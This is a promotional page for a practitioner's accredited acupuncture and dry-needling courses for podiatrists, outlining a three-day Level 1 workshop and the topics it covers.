Acupuncture For Podiatry

As well as seeing and treating clients at my clinic, I also have online courses and workshops for the use and understanding of classical acupuncture and evidence-based dry-needling acupuncture.

I will be holding workshops for my course on Podiatric Medical acupuncture (Level 1) which will be run over 3 days and will be alongside 5 online interactive lessons. The aim of the workshops and online courses is to help you as a podiatrist gain confidence in your acupuncture point selection and allow you to be a more successful practitioner.

What is podiatry?

Podiatry involves the assessment, diagnosis and treatment of conditions related to the foot, ankle, lower limb and its associated structures. Acupuncture may be used to treat or help treat many podiatric conditions such as predislocation syndrome, hallux limitus, cuboid syndrome, lateral ankle sprain, sinus tarsi syndrome, capsulitis posterior tibialis dysfunction and much more.

How can my course benefit you as a podiatrist?

My course is accredited by the College of chiropody and podiatry. It has been designed specifically to meet the needs of busy podiatrists with an interest in acupuncture for the treatment of musculoskeletal and associated disorders of the lower limb.

A western medical diagnosis is encouraged, however, traditional Chinese concepts are combined with Western medical acupuncture to equip students with a general understanding of acupuncture and it’s evolving evolution over the centuries. You will be introduced to techniques showing how Pmyofascial trigger points and classical acupuncture points can be combined and integrated into your daily practice for the benefit of the patients.

The course will provide evidence-based research in acupuncture to support its teaching. There is a strong emphasis on health and safety, needling techniques, contraindications, and the importance in the selection of specific classical acupuncture and/or myofascial trigger point in the management of common musculoskeletal conditions affecting the lower limb. This allows students to develop confidence and experience in the use of acupuncture.

Over the course, you will:
– Be introduced to medical acupuncture and the history of medical acupuncture
– Learn about health and safety and needling technique
– Be taught the current understanding and mechanism of acupuncture
– Be introduced to myofascial trigger points
– Be taught about meridians and principles of trigger points- Be shown case studies to enhance your learning

You’ll also be encouraged to critically evaluate and reflect on their own clinical practice and where applicable, challenge the existing evidence base.
The program will provide the required knowledge and understanding of the physiological effects of acupuncture on pain management and the healing process.
